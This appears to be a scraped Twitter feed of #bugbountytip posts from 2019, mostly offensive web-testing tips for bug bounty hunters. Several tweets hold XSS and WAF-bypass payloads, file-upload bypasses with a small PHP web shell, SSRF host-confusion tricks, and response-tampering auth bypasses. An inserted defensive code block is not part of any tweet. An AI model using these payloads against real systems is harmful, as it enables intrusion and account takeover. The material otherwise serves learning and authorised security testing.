gweeperx
@gweeperx


2019-09-18 07:42:39
2 Just another XHR cookie/body stealer: https://t.co/kbmsAYuwsJ #bugbounty #bugbountytip #bugbountytips
ʊռӄռօառ ʊֆɛʀ
@Unknownuser1806


2019-09-18 03:39:15
0 DetExploit - Software That Detects Vulnerable Applications and Not-Installed OS Updates and Notifies the User https://t.co/HrwGYO0fjL #bugbounty, #bugbountytip, #hacking
ʊռӄռօառ ʊֆɛʀ
@Unknownuser1806


2019-09-18 03:33:03
0 #XSS, #SQLi, #CSRF, #SSRF, #XXE, OS command #injection, directory traversal, and #HTTPrequest smuggling. -> Everything you need to get started with #bugbounty #bugbountytip, #hacking https://t.co/4ZnwNy6STO
daniel_v
@danielv47251669


2019-09-17 18:09:57
0 #bugbountytip #bugbountytips >found a login page restricted to business email only >intercepted the signup request > intercepted response from this request > changed response body from "false" to "true" > auth bypass > internal access to the platform
farukh
@Farukhwap


2019-09-17 16:17:30
0 @Olacabs @ola_supports @olamoney_in @OlainUK why is it empty 🤔 #fixit #bugbountytips #bugbountytip #loot #Ola https://t.co/CS0HUxo0if
luffydragneel
@Hackers_Guild


2019-09-17 15:56:39
0 Suppose there is contracts page at https://t.co/guSo2PGluZ meant only for Admins and not visible in the lower privileged user's UI. Just directly browse to that page from this lower privileged account, and you might end up seeing the contents there. #bugbountytip #bugbounty https://t.co/1cOxnJ0OTI
Vulkey_Chen
@Vulkey_Chen


2019-09-17 13:52:17
1 #bugbountytip #burpsuite #bugbountytips #bughunter I built a Burp Suite extension to mark sensitive information. If "mobile phone number" and "email address" information appear in the response content, then the request is marked in red. https://t.co/qeY996qzTi
ʊռӄռօառ ʊֆɛʀ
@Unknownuser1806


2019-09-17 12:54:42
0 Awesome #Shodan search queries https://t.co/Wo0inc380w #bugbounty, #bugbountytip, #hacking
Vedant
@ved_wayal


2019-09-17 08:58:43
0 Blind XSS is lub 😜😍 #bugbountytip https://t.co/GHlwkPix6W
Rishabh
@____cypher____


2019-09-17 06:58:06
0 SSRF tip: [email protected] ==> black[.]com black[.]com?white[.]com ==> black[.]com black[.]com#white.com ==> black[.]com #bugbountytip #BugBounty #bugbountytips
oops
@a_l_e_r_t_1_


2019-09-17 06:44:01
0 Search for high-level vulnerabilities if you don't want the vulnerability to be duplicated :) #bugbountytip
Sultan Haikal
@SultanMoeslim


2019-09-17 06:08:28
0 {Reviews} in bugbounty, report recipients ... are taking more references from reporters! to imitate / change systematic design, secure etc. reporters don't get any profit. and those who change this, of course benefit internally. best manipulation. #bugbounty #bugbountytip
AFAQUE KHAN
@Afaquekhan24


2019-09-17 05:13:43
1 @stereotype32 Remember you fools...you bug bounty hunter fools... any bypass technique that is publicly posted no longer works in a real world scenario .....this is my #protip for today #hackerone #bugbountytip #BugBounty #bugbountytips #bugcrowd ...Happy hunting...
Pomegranate 🌴
@ret2pomegranate


2019-09-17 04:33:45
1 When you & your partner get a bounty. #bugbountytip #bugbounty #infosec https://t.co/3rjqUgsXeE
luffydragneel
@Hackers_Guild


2019-09-17 03:46:04
1 Suppose the sensitive content is at /folder/content. If there is proper access control on /folder, it doesn't mean that there is proper access control when you visit /folder/content directly. Always look for access control issues on each endpoint. #bugbountytip #bugbounty https://t.co/J8jVcy2IKB
Pomegranate 🌴
@ret2pomegranate


2019-09-16 23:47:44
0 Just reported Double-Sequence XSS which affects 2 parameters in a single endpoint to a program on @Hacker0x01. #bugbounty #bugbountytip #infosec
Michele Romano
@Mik317_


2019-09-16 18:22:47
0 @Manikan77602456 understand how programs work, and definitely how other researchers think ;). Probably seeing how reports are thought out/presented/explained is the best thing you can do to learn. Also, check Twitter #bugbountytip and similar: you'll find good bypasses or Medium articles.
Jakub Juszczak
@apertureless


2019-09-16 12:11:31
0 Blind XSS is still my favorite. Spray the payload and after some time, you receive your Christmas present 🎁 #infosec #bugbountytip
intigriti
@intigriti


2019-09-16 11:56:17
2 This actually worked on the first site we tested! 🤯 P.S.: Legacy or unimplemented OAuth flows often contain vulnerabilities that can lead to account takeover. 😈 Thanks for the #BugBountyTip, @ngalongc! https://t.co/vwAi9hhHrm
SilexSecure
@silexsecure


2019-09-16 11:23:55
0 @silexsecure Today you will learn WordPress penetration testing using WPScan and Metasploit. @rsilexlab @metasploit @ubuntu @kalilinux @wordpressdotcom #infosec #cybersecurity #bugbountytip #bugbounty #Pentesting #GodMorningmonday #CyberAttack #SSL#GOODhat
Karna
@karna__1


2019-09-16 11:04:38
1 If you want a free online phone number service to receive OTP(s) for your web app testing, here's one: https://t.co/3dPt58DZGy #bugbounty #bugbountytip
Oops!
@Corrupted_brain


2019-09-16 10:17:18
0 This Oracle directory architecture was quite helpful for me to harvest critical information by exploiting XXE and reading files locally. #bugbountytip #bugbounty #Oracle https://t.co/Fjhg3OX2Gd
Sp
@spt_2020


2019-09-16 10:06:29
0 Collection of Bug Bounty Tips - will be updated daily https://t.co/BYm6GxAFnz #bugbountytip
oops
@a_l_e_r_t_1_


2019-09-16 08:48:37
0 Cheap and no ads. Bug bounty is everywhere. 1 Bug = 60 x App. Learn & Hack & Earn Money. Good Hacking! https://t.co/JPaA4CKmfO #openredirection #xss #xxe #ssrf #bounty #rce #graphql #sqlinjection #bugbountytip #webpentest #owasp #bugbountytip #python #ruby #csfr #hack #hackers
Juha Remes
@juha_remes


2019-09-16 08:36:33
0 This is a great #bugbountytip. 👍 https://t.co/XteWTBVmMe
oops
@a_l_e_r_t_1_


2019-09-16 08:22:45
0 Really very, very slow in fixing gitlab vulnerabilities #bugbountytip
Pomegranate 🌴
@ret2pomegranate


2019-09-16 05:54:08
0 #BugBounty #bugbountytip #infosec Normal User: “Text Injection” (The Depression Period) Bug Bounty Hunter: Arbitrary Spoofed Character Encoded Injection via the Roman Alphabet. https://t.co/Z20cvTDtUG
Pomegranate 🌴
@ret2pomegranate


2019-09-16 03:35:05
2 Just reported XSS to a program on @Hacker0x01. #InfoSec #bugbounty #bugbountytip Got XSS through a POST request in a parameter, automated it through my web-server due to `document.location.href=` being used in the vulnerable parameter.
ʊռӄռօառ ʊֆɛʀ
@Unknownuser1806


2019-09-16 02:45:02
0 This tool collects all information about all devices that are directly connected to the internet with the specified keywords that you enter. This way you get a complete overview. #shodaneye : https://t.co/AarJFRVDOP #hacking #bugbounty #bugbountytip
A DNF 🦖
@binb4sh


2019-09-16 01:08:34
0 If the target server is running Windows and you can create files and directories on it, try to create ones with forbidden names (CON, AUX, etc.)! It may cause errors resulting in Info Disclosure/DoS. An example written in PHP: file_put_contents("con.png",""); #bugbountytip
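A defensive counterpart to the tip above, added here as an example and not part of the tweet: an upload-filename check that recognises the reserved Windows device names. Windows resolves the name from the stem before the first dot and ignores trailing dots and spaces, so con.png, COM1.txt and "nul. " all name a device; RESERVED_DEVICE_NAMES, is_reserved_windows_name and sanitize_upload_name are names chosen for this demo.

```python
import re

# Reserved DOS device names on Windows. The check is case-insensitive and
# applies to the stem before the first dot, so "con.png" still names CON.
RESERVED_DEVICE_NAMES = frozenset(
    ["CON", "PRN", "AUX", "NUL"]
    + [f"COM{i}" for i in range(1, 10)]
    + [f"LPT{i}" for i in range(1, 10)]
)

# Characters kept in a stored filename; everything else becomes "_".
_SAFE_CHARS = re.compile(r"[^A-Za-z0-9._-]")


def base_name(filename: str) -> str:
    """Strip any directory part, accepting both / and \\ separators."""
    return filename.replace("\\", "/").rsplit("/", 1)[-1]


def is_reserved_windows_name(filename: str) -> bool:
    """True if Windows would treat this filename as a device name."""
    base = base_name(filename)
    # Win32 silently drops trailing dots and spaces: "nul. " is still NUL.
    base = base.rstrip(". ")
    # Only the stem before the first dot decides: "con.png" -> "con".
    stem = base.split(".", 1)[0]
    return stem.upper() in RESERVED_DEVICE_NAMES


def sanitize_upload_name(filename: str, fallback: str = "upload") -> str:
    """Return a name that is safe to create on a Windows-backed store.

    Path components are removed, unexpected characters are replaced, and a
    reserved device name gets a "_" prefix so it no longer refers to the
    device while the extension (and thus the apparent file type) survives.
    """
    base = base_name(filename).rstrip(". ")
    base = _SAFE_CHARS.sub("_", base)
    if not base:
        return fallback  # e.g. "..." or a bare directory separator
    if is_reserved_windows_name(base):
        base = "_" + base
    return base
```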
terjanq
@terjanq


2019-09-16 00:22:36
3 I haven't published any writeups in a while. Here is my latest #writeup to an awesome #buyify challenge from #csaw19 #ctf that has just ended a few hours ago. The author of the task is @itszn13. You should definitely check this out! https://t.co/uAWk6hsyoI #bugbountytip
Drok3r🏴‍☠️
@drok3r


2019-09-15 21:23:18
0 pixload -- Image Payload Creating tools #bugbountytip #payload Link [ https://t.co/6wh5X9EWXB ] https://t.co/Fc4kBuKmMp
securibee 🐝
@securibee


2019-09-15 19:19:08
0 @Random_Robbie @j_opdenakker @Vin1515 @zseano @NahamSec @TomNomNom @d0nutptr @stokfredrik @yaworsk @Alyssa_Herrera_ has great content as well, make sure to follow her! @ITSecurityguard Follow #bugbountytip although it's pretty noisy. Subscribe to the newsletter from @PentesterLand https://t.co/e2fgYy31Gr I keep forgetting people. My bad!
dykaushik
@dykaushik


2019-09-15 17:40:17
0 Collection of Bug Bounty Tips - will be updated daily https://t.co/GGQro6C5zH #bugbountytip
Mayur Parmar
@th3cyb3rc0p


2019-09-15 17:13:52
0 Must read blog🙂 https://t.co/4nQ54tutfD #bugbountytip #BugBounty #bughunting #ethicalhacking
W🌍aR🐁eeq
@wareeq_shile


2019-09-15 16:44:53
0 Can this still be taken over? #BugBounty #bugbountytip #bugbountytips https://t.co/nN5Xdani38
Wh11teW0lf
@Wh11teW0lf


2019-09-15 16:26:05
1 #bugbountytip The most vulnerable place in WordPress/Drupal is custom themes and plugins. WordPress location: /wp-content/themes/ and /wp-content/plugins/ You can find their names with the Wayback archive or the site map in Burp.
Murdockz
@Murdockz_CEH


2019-09-15 14:50:00
0 Passive recon 😁 #bugbountytip #bugbountytips #bugbounty https://t.co/oCvjzwcsb6
Somdev Sangwan
@s0md3v


2019-09-15 13:27:18
0 @yassergersy Why is this #bugbountytip and not #websecuritytip?
vavkamil
@vavkamil


2019-09-15 13:01:34
1 How to bypass Android certificate pinning and intercept SSL traffic #bugbounty #bugbountytip https://t.co/KFRUCYEc96
Youssef A. Mohamed
@GeneralEG64


2019-09-15 12:36:29
4 The easiest P1 ever!! 😂😍 Steps to Reproduce: Navigated to https://t.co/CEADFzHYUD Directory Bruteforcing found "admin" Bruteforcing into it found "users.db" Exposing admin's creds in plaintext! Logging in to the Admin Panel. #BugBounty #bugbountytip https://t.co/7SuX3E5otC
BlackClover
@Bc10ver


2019-09-15 12:15:41
0 Top story: @yassergersy: '#bugbountytip: Load response, extract all valid parameter names, submit all as GET and POST parameters, check which one is being reflected, you will increase your chances to get #xss' https://t.co/dkBDDSkQ0n, see more https://t.co/fVnXn9Z0FJ
👻in🐚
@0xerror


2019-09-15 12:15:40
0 XSS News: @yassergersy: '#bugbountytip: Load response, extract all valid parameter names, submit all as GET and POST parameters, check which one is being reflected, you will increase your chances to get #xss' https://t.co/TDrl37pldF, see more https://t.co/4VACxHYGGn
oops
@a_l_e_r_t_1_


2019-09-15 08:55:16
1 Cheap and no ads. Bug bounty is everywhere. 1 Bug = 60 x App. Learn & Hack & Earn Money. Good Hacking! https://t.co/JPaA4CKmfO #openredirection #xss #xxe #ssrf #bounty #rce #graphql #sqlinjection #bugbountytip #webpentest #owasp #bugbountytip #python #ruby #csfr #hack #hackers
nocomp
@nocomp


2019-09-15 08:01:13
0 Any good #BugBounty Discord place to learn and share? #bugbountytip thx for RT
HackIsOn ®
@hackison


2019-09-15 07:57:21
0 Ghazi is a Burp Suite plugin for testing various payloads like "XSS, SQLi, SSTI, SSRF, RCE and LFI" through different tabs, where each tab will replace every GET or POST parameter with the selected tab in the "Proxy" or "Repeater" tab. https://t.co/PUhzq0SuEo #bugbounty #bugbountytip
(((Gamliel)))
@Gamliel_InfoSec


2019-09-15 05:12:49
0 Awesome #bugbountytip https://t.co/DnjdSHMcix
Securisec 🚀
@securisec


2019-09-15 02:08:06
0 "RT RT YoKoAcc: Bismillah. Releasing one of my RCE stories at one Bug Bounty Program. Race Condition that could Result in RCE - (A story with an App that temporarily stored an uploaded file within 2 seconds before moving it to Amazon S3). https://t.co/j8fCpvwWy6 #bugbountytip…
Ankur Vaidya
@4N_CURZE


2019-09-15 00:14:37
0 Finally reached and completed one more milestone :) 😀😃😍😍♥️♥️♥️ #openbugbounty #xss #bugbounty #bugbountytip #bughunter #WhiteHats #pentest #Pentesting @openbugbounty @openbounty @whitehatsec @bugbountyforum https://t.co/zKVguucXI3
Pomegranate 🌴
@ret2pomegranate


2019-09-14 20:26:55
0 Just reported RCE to a program on @Hacker0x01. Wish me the best of luck. #infosec #bugbounty #bugbountytip Kind of nervous because of an accidental reboot that occurred while I was testing for a PoC.
Bijan Murmu
@0xBijan


2019-09-14 20:14:02
0 New write-up "How I found a simple and weird Account takeover bug" https://t.co/32185JXNW6 #bugbounty #bugbountytip
Aziz Hakim
@hackerb0y_


2019-09-14 20:09:17
0 I was logged in to a program's portal!🧐 Suddenly I visited this URL!🙄 https://*.redacted.com/user/profile/delete and GUESS what? My account got deleted without any confirmation!🤣 #bugbountytip #bugbounty
Murdockz
@Murdockz_CEH


2019-09-14 18:22:10
0 2. Will do a write up on how to exploit graphql after bug is fixed and bounty rewarded 😄...there is a part I can't disclose in part 1. #bugbountytip #BugBounty #bugbountytips
Murdockz
@Murdockz_CEH


2019-09-14 18:20:13
0 1. Able to read anyone's gender status when it is set to private or only shown to friends. User A is not friends with User B. User A cannot see User B's gender status. User A sends a GraphQL request for User B and User B's private gender status is revealed. #bugbounty #bugbountytip #bugbountytips
Pomegranate 🌴
@ret2pomegranate


2019-09-14 16:10:14
0 Accidentally ran a software-specific ‘reboot’ command & crashed the server. It’s been 10+ hours and no response. Should I report this issue to the acquisition/asset? #bugbounty #InfoSec #bugbountytip
Aditya
@hetroublemakr


2019-09-14 14:15:05
1 Ran into an interesting blog on Medium about #bugbountytip #infosec by @bbinfosec https://t.co/kUUQiAWtca
YasserGersy
@yassergersy


2019-09-14 13:39:56
1 #bugbountytip: Load response, extract all valid parameter names, submit all as GET and POST parameters, check which one is being reflected, you will increase your chances to get #xss https://t.co/wEtN3fl4xT
oops
@a_l_e_r_t_1_


2019-09-14 12:42:06
0 My favorite xss payload : <img onerror="{alert`1`}" src> #bugbountytip
Fisher
@Regala_


2019-09-14 11:17:53
0 I'll experiment with streaming like all the cool kids are doing these days 😇 Starting October, schedule to be announced. Any particular subjects you'd be interested seeing or people? Let me know below 👇 #bugbounty #bugbountytip #infosec
Khaled Mohamed
@xelkomy


2019-09-13 20:15:20
0 Shopify XSS, Google auth: this video is awesome #bugbountytip #hackerone #BugBounty https://t.co/JbWlhXSOCK
Sandeep Raghav
@Sandeep_tunna


2019-09-13 18:03:30
0 Hey, @LinkedIn , I found a bug in your system. Please respond if you want to fix it. #bugbounty #testing #bugbountytip #LinkedIn
Simon
@7s26simon


2019-09-13 15:48:26
0 Submitted my first #bugbounty report !!! Hope it hasn't been reported already #ethicalhacker #hack #hacking #pentest #pentester #bugbountytip
Mohan Sri Ramakrishna
@S1r1u5_


2019-09-13 14:10:54
0 Yay, I was awarded a $500 bounty on @Hacker0x01! https://t.co/ac1KEZZZWM #TogetherWeHitHarder. #bugbountytip Actually, I am afraid to test the program cuz I saw some good hackers in the thanks page, But I started and I found a reflected XSS on the main page itself.😇
Mourad
@SecuAudit


2019-09-13 11:07:24
0 Any advice how to get into "Apache Axis version: 1.2.1" where remote admin is disabled ? #bugbountytip #bugbountytips
expl0itc0der
@vanshitmalhotra


2019-09-13 06:23:51
0 HTML to PDF converter bug leads to RCE in Facebook Server -- #BugBounty #BugBountyTip #Writeup https://t.co/UgmPhls8Mb
saranraj
@KceSaranraj


2019-09-13 01:58:28
0 I have the following code <li title="?"> test </li> I need to inject a vector to break out of the HTML attribute and execute the alert using an event. Is there a way to achieve this without using single/double quotes? <>&*#%\'" - Not Allowed @h1_kenan @le4rner #bugbountytip #xss
Mr.CryptoCZ
@cechv2


2019-09-12 06:56:18
0 #Electroneum #ETN $ETN is looking for Bug bounty hunters, IT Gurus, Hackers, if you want to earn money and help @electroneum be more secure go and check our Hackerone program #bugbountytip #Hacker #hackerone #fintech #app https://t.co/qUZ0h5mqqK
Yadhavi
@PrincessYadhavi


2019-09-12 05:18:36
0 Found a subdomain which is pointing to CloudFront using a CNAME. And when I open the page it shows the "NoSuchBucket" "The specified bucket does not exist" error. Is subdomain takeover possible here? If yes, how? #bugbounty #bugbountytip #bugbountyhelp #s3

@pouyana1


2019-09-12 04:19:02
1 *content-length filtering: use small size shells like: <?='$_GET[x]'?> #bugbounty #bugbountytip #hacking #infosec #hack

@pouyana1


2019-09-12 04:19:01
0 *client side filtering: upload a valid file, intercept the request and change it to the shell extension (php,asp,jsp,..) *content-type filtering: change the content-type to a valid content-type like: image/jpeg #bugbounty #bugbountytip #hacking #infosec #hack

@pouyana1


2019-09-12 04:19:01
1 file upload restriction bypass: * name filtering: 1) blackboxing: try to use file extensions like: php[3-n], phtml, pht. 2) whitelisting: use null-byte: shell.php%00.gif use double extension format: shell.php.jpg or shell.jpg.php #bugbounty #bugbountytip #hacking #infosec #hack
Henry Chen
@chybeta


2019-09-12 03:06:03
1 bounty calculation formula: crontab(subdomain(amass+subfinder+...) + port(masscan + nmap) + screenshot + dirsearch) + slack = bug bounty #bugbounty #bugbountytips #bugbountytip https://t.co/QCODeeZhC3
Murdockz
@Murdockz_CEH


2019-09-12 00:25:03
0 Sometimes you need to take a long step back to learn new technologies in order to enhance your Bug Bounty skills. Learn the technology that companies use in order to break and exploit them even more. #bugbounty #bugbountytip #bugbountytips https://t.co/lge8ogvAPr
Arif Khan
@payloadartist


2019-09-11 07:06:15
1 Awesome giveaway! 🔥 #infosec #bugbounty #bugbountytip https://t.co/0qJjiSx3zl
Sukhmeet Singh
@MadGuyyy


2019-09-11 01:30:19
0 > Website had admin panel with "Login with Google" > Only allowed Google login with company's email > Created an email account [email protected] > Created Google account with that email > Logged into admin panel with Google. 💰$1500 #BugBountyTip #InfoSec #BugBounty
C1h2e1
@C1h2e11


2019-09-11 00:48:34
0 #bugbountytip #bugbountytips Using https://t.co/5gM8SE3B4J for subdomain monitoring, last night I found a .DS_Store leaking on the latest subdomain on https://t.co/5gM8SE3B4J
Guilherme Keerok
@k33r0k


2019-09-10 17:08:23
2 Cloudflare WAF bypass: open("https://host/?xss=%3Ca/href=javascript:1%26%26%26%23x6e;ame%3Eclick me%3C/a%3E","<svg onload=alert(document.domain)>"); #bugbountytip #bugbounty #xss #bugbountytips
Jenish
@_jensec


2019-09-10 16:39:37
2 Yay, I was awarded a $2,000 bounty on @Hacker0x01! For accessing company dashboard via creating account with Email “[email protected]” on main web app and login to dashboard with SSO. #bugbountytip
wywwzjj
@wywwzjj


2019-09-10 16:29:38
0 @artofwebhacking @chybeta https://t.co/O8D1Pp6IcP Here is a website that archives bug bounty tips. 👉https://t.co/Kvxfo3jCh8 Check it out, it has other useful resources too. 😀 #bugbounty #BugBountyTip #bugbountytips @Hacker0x01
o k t a v a n d i
@0ktavandi


2019-09-10 16:08:24
1 anyone have hackerone report with SSRF issue 307 redirect bypass?? #bugbountytip #bugbountytips
Rishabh
@____cypher____


2019-09-10 09:40:44
0 Perfect oneliner for subdomain enumeration curl -s 'https://t.co/A3Qe45ZOra%.'<TARGET>'&output=json' | jq '.[] | .name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u #bugbounty #bugbountytip #bugbountytips #infosec
brsn
@brsn76945860


2019-09-10 04:08:46
0 @achillean @ItsReallyNick @x04steve @shodanhq I've tweeted this a few hours ago, but this works for me:
----------
import codecs
import mmh3
import requests

response = requests.get('https://yourwebsite/favicon.ico')
# Shodan hashes the base64 text of the favicon, line breaks included;
# codecs.encode reproduces what Python 2's str.encode('base64') produced
favicon = codecs.encode(response.content, 'base64')
hash = mmh3.hash(favicon)
print(hash)
----------
#Shodan #bugbountytip
Securisec 🚀
@securisec


2019-09-09 14:25:30
0 "RT RT osamaavvan: My Writeup about Exploiting JSONP and Bypassing Referer Check. #bugbountytip #bugbountytips #Security https://t.co/pUyJV4QdcW"
Iheb
@ihebhamad514


2019-09-09 12:46:53
0 I found a #bugbounty program where it implements a captcha protection field after certain requests with Burp Intruder, the only way to bypass it is to delete the Cookie header. As a result, I got 2 valid user accounts. #bugbountytip
Aussan 🇨🇦
@aussan_m


2019-09-09 12:33:12
0 A lot of the time people forget to look at the response or intercept the response in Burp. Always examine the response in detail, especially when logging in. I was able to go from regular user to Admin by manipulating the response #bugbountytips #bugbountytip
Japz Divino
@japzdivino


2019-09-09 02:42:25
0 Reading hacktivity report will lead you to bounties by just bypassing the fix for the disclosed report.👌 #noobtip #bugbountytip https://t.co/ppnliULt5T
Hx01
@Hxzeroone


2019-09-08 05:35:30
1 #bugbountytip If the password reset link in the email is shortened, try checking for common hashes/encodings; you may end up with a gold mine. In the below scenario the URL was shortened and the URL id was sequential and encoded in base64 --> scraping all generated password reset links. https://t.co/n11msD9iPP
x30r
@x30r_


2019-09-07 21:55:13
1 Into cyber security?? I don't know who votes what so let's have a poll! What suits you the most! #cybersecurity #bugbountytip #bugbounty #infosecurity #infoeec
Hussein Daher
@HusseiN98D


2019-09-07 19:40:04
7 Analysis of an RCE I found past week. RT and Like if you want more! If you got a bug bounty program, I'm open to any invite :) #bugbounty #bugbountytip #bugbountytips #infosec https://t.co/VX6QATnRJH
An0nym0us
@MeetAn0nym0us


2019-09-07 17:54:13
1 #bugbountytip While testing a Laravel site try injecting different kinds of payloads or changing request methods GET>POST or POST>GET. This will result in a Laravel exception handler error disclosing AWS, Database, and SMTP credentials. https://t.co/jTnU3rf28y
Zeinab Raadsato
@ZRaadsato


2019-09-07 17:21:09
0 All courses are available: Burp Suite, Ethical Hacking, Networking, Secure Coding Free for limited time. #bugbountytip #BugBounty https://t.co/fZCGs25uF0
Jenish
@_jensec


2019-09-07 09:34:14
0 Yay, I was awarded a $1,050 bounty on @Hacker0x01 for bypassing 2FA via old API version’s login page! https://t.co/YGr8yp0IKy #TogetherWeHitHarder #bugbountytip
Osama Avvan
@osamaavvan


2019-09-07 08:22:00
2 My Writeup about Exploiting JSONP and Bypassing Referer Check. #bugbountytip #bugbountytips #Security https://t.co/Ewt9p3qPSe
Muzammil Kayani 🇵🇰
@muzammilabbas2


2019-09-06 15:26:35
0 #bugbountytip: Access the site without logging into an account; you will get some hidden endpoints which are overlooked by others.
Tinu rockk
@TinuRock007


2019-09-06 11:14:47
0 https://t.co/kCnDw5TEZu Open redirect to xss (2019) @BugBountyPOC #bugbountytips #BugBountyPOC #BugBounty #security #bugbountytip #bugbountytips #xss https://t.co/KTAOhiR0I7
C1h2e1
@C1h2e11


2019-09-06 10:05:40
1 #bugbounty #Bugbountytip Yesterday's problem was solved, forgetting to modify the Content-Length, but the result is duplicated. So sad
Shamem Ahmad
@blkryd


2019-09-06 09:13:48
0 Finding webshells in a linux server. find . -name "*.php" | xargs grep -E 'webshell|' #Bugbountytip #hacktolearn
Shamem Ahmad
@blkryd


2019-09-06 08:50:54
1 A plus sign (+) A simple URL encoded space (%20) A null byte (%00) A newline (%0a) A tab (%09) A carriage return (%0d) #Bugbountytip
OSRC
@OsrcSecurity


2019-09-06 07:59:10
0 We are updating the official website now, but always welcome all the hackers chasing the bug bounty of OSRC, any issue or question about the programs, just leave your messages or to our emailbox [email protected] #Hackers #Bugbountytip
Leonel Emiliano
@leoalgare


2019-09-06 05:02:35
0 Hey guys, is there any way to perform a bypass of CSRF if I need to set a specific XSRF-TOKEN in order to exploit the issue? I wasn't able to use XHR because of CORS policy. Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: * #bugbountytips #bugbountytip
Shubham Sharma
@Shubham_pen


2019-09-06 03:13:23
7 Today you will learn WordPress penetration testing using WPScan and Metasploit. @rajchandel @metasploit @ubuntu @kalilinux @wordpressdotcom @github #infosec #cybersecurity #bugbountytip #bugbounty #Pentesting #GodMorningFriday #CyberAttack #oscp #blackhat https://t.co/KT2wD17IVG
ak1t4 🇦🇷
@akita_zen


2019-09-06 02:02:10
9 #Bugbountytip: forget the subdomains for recon! go directly for the ASN & hit the network-range organization: A new world arises without WAFs, a lot of messy SSL certs, unprotected hosts & private hidden scopes! #bugbounty #infosec #thinkOutsideTheBox
C1h2e1
@C1h2e11


2019-09-05 17:05:24
1 #bugbounty #BugBountyTip I found an HTTP Request Smuggling and looked for the endpoint that echoed the request. In this endpoint, I tried to enter long data successfully, but I ended up testing only a few characters of the request. I don't know why this is😂
Ammar Amer🇸🇾
@cry__pto


2019-09-05 14:17:38
1 -“An XSS on Facebook via PNGs & Wonky Content Types”: https://t.co/K7uiWoQtZ8 -shopifyapps XSS on sales channels via currency formatting: https://t.co/wu6SZ1DcxE -UNITED AIRLINES XSS: https://t.co/kRbaMJTXlN -GOOGLE TAG MANAGER STORED XSS: https://t.co/PBAj81OEE1 #BugBountyTip
Proxy
@LinuxKodachi


2019-09-05 13:49:35
0 Here is a website that archives bug bounty tips. 👉https://t.co/hG46WtG0dd Check it out, it has other useful resources too. 😀 #bugbounty #BugBountyTip #bugbountytips @Hacker0x01
emir c a
@emirca_


2019-09-05 10:13:07
0 Got the 500 error with single quote but can’t find the SQLi parameter for it... But 500 error can lead to SQLi right? #BugBounty #bugbountytip
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-09-05 05:59:42
0 CloudFlare {WAF} "R-XSS" Bypass; 🛡 ~ <isindex action="javas&tab;cript:alert(1)" type=image> ~ #BugBounty #BugBountyTip #WAF #infosec
David Schütz
@xdavidhu


2019-09-04 17:08:11
2 #bugbountytip - If your target requires phone number verification and you need more accounts, you can just buy a really cheap prepaid SIM card, and without topping it up, you can receive the verification codes in SMS! ⚡ (even better if you have a dual-sim phone) https://t.co/oUDJKIik3X
Mourad
@SecuAudit


2019-09-04 16:25:54
0 How do you deal with your hosting server provider for large Port Scanning complaints ? #bugbounty #bugbountytip #pentesting #hackerone https://t.co/pn9Zzmxuaa
sudoka
@sudo_sudoka


2019-09-04 16:10:23
0 Does anyone have experience with @InternetNZ bugbounty program? #bugbounty #bugbountytip
intigriti
@intigriti


2019-09-04 12:27:00
6 Did you know you can extract the AWS S3 bucket name from an object URL by appending these parameters? 🕵️Thanks for the #BugBountyTip, @neeraj_sonaniya! #HackWithIntigriti https://t.co/cfVpRpOw1s
Hackers Academy
@Hackers_Academy


2019-09-04 10:40:17
0 98 Days Left! Introducing the 2nd training... @banyrock will take you on a 4 days journey of fully practical web hacking & bug hunting training. Be ready to learn some advanced techniques! #bugbountytip #Pentesting #infosec https://t.co/ixzLERf8Io https://t.co/9B4tg5DSvF
Rémy Marot
@R_Marot


2019-09-03 21:13:30
0 Quick #bugbountytip : if you are testing a symfony application, do not forget to check both app_dev.php and app_test.php controllers for debug information and sometimes sensitive information disclosure
Julien Ahrens
@MrTuxracer


2019-09-03 18:36:57
0 Plaintext password disclosure leading to admin access on a development environment. That just made my day. Remember: Always dig into JS files. They're a gold mine of stuff! #BugBounty #BugBountyTip
Dhamu
@Dhamuharker


2019-09-03 15:02:54
1 #bugbountytips The AWS Cloud Post Exploitation framework! POC https://t.co/nmhvNDdIRU #BugBounty #bugbountytip #ItTakesACrowd #togetherwehitharder
abdoul gadiri balde
@moodiAbdoul


2019-09-03 12:17:38
2 #bugbountytip you can also use https://t.co/SI3CMaQq42 during recon , just search your target website or app to know how it work in short of time #infosec #bugbounty
Un4gi
@Un4gi1


2019-09-03 08:50:20
0 #bugbountytip If you don’t have enough room for typical XSS, try <base href=//url.co>. This will make every link on the same page redirect to the URL referenced! 😃
Bob Nicolson
@NicolsonBray


2019-09-03 08:01:00
0 Google throws bug bounty bucks at mega-popular third-party apps https://t.co/ZSu5DHaLjf #BugBounty #bugbountytip #google #Apps #cybersec #infosec #Hackers https://t.co/UzhkCYOmww
Meelo
@CaptMeelo


2019-09-02 12:21:41
1 Just published another post that might be useful during #bugbounty or #recon sessions. #bugbountytip https://t.co/NTTaI2KqHE
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-09-02 06:43:33
6 ModSecurity { XSS } Detection Bypass; 🔐 { 1 }; <img src=x:alert(alt) onerror=eval(src) alt='spyerror'> { 2 }; "></tag><svg onload=alert(spyerror)> #BugBounty #BugBountyTip #WAF #infosec
Cyberthereaper
@Cyberthereaper3


2019-09-01 21:30:41
0 There is no CSRF token when changing email. I'm creating a CSRF PoC, and when I try to open poc.html with my other account, I get a "session expired" warning. What is the problem? How can I bypass it? #hackerone #bugcrowd #infosec #BugBounty #bugbountytip #csrf #intigriti
%00Termi
@Elhan65805947


2019-09-01 12:36:25
0 https://t.co/xNc07m02x7 >> campanyname.tld Paste >> https://t.co/NLo3oX2Loz Sometimes you may find upcoming project details, link to invite private meetings, other stuff. Keep on checking regularly. #bugbounty #bugbountytip
Ammar Amer
@cry__pto


2019-09-01 12:30:19
1 It is not difficult to bypass #XSS filters. Remember that a firewall is a stupid device, just edit a simple part of the payload. You can use encoding, tag modifiers, and a lot of other ways like adding some unfamiliar characters or symbols to the payload. #bugbountytip
ak1t4 🇦🇷
@akita_zen


2019-09-01 01:43:09
7 #Bugbountytip: take your time to learn bash, curl & python 🐍 basic scripting. With only a few lines of those you can break anything! Automate your scripts & get the best PoCs #bugbounty #infosec
Cyberthereaper
@Cyberthereaper3


2019-08-31 17:22:20
0 How can I redirect an XHR login page? If I capture the request with Burp, the web page redirects to another web page. But I can't do it with the URL? Any idea? #hackerone #bugcrowd #bugbountytip #infosec #redirect #vulnerability
Security Chops
@securitychops


2019-08-31 15:05:31
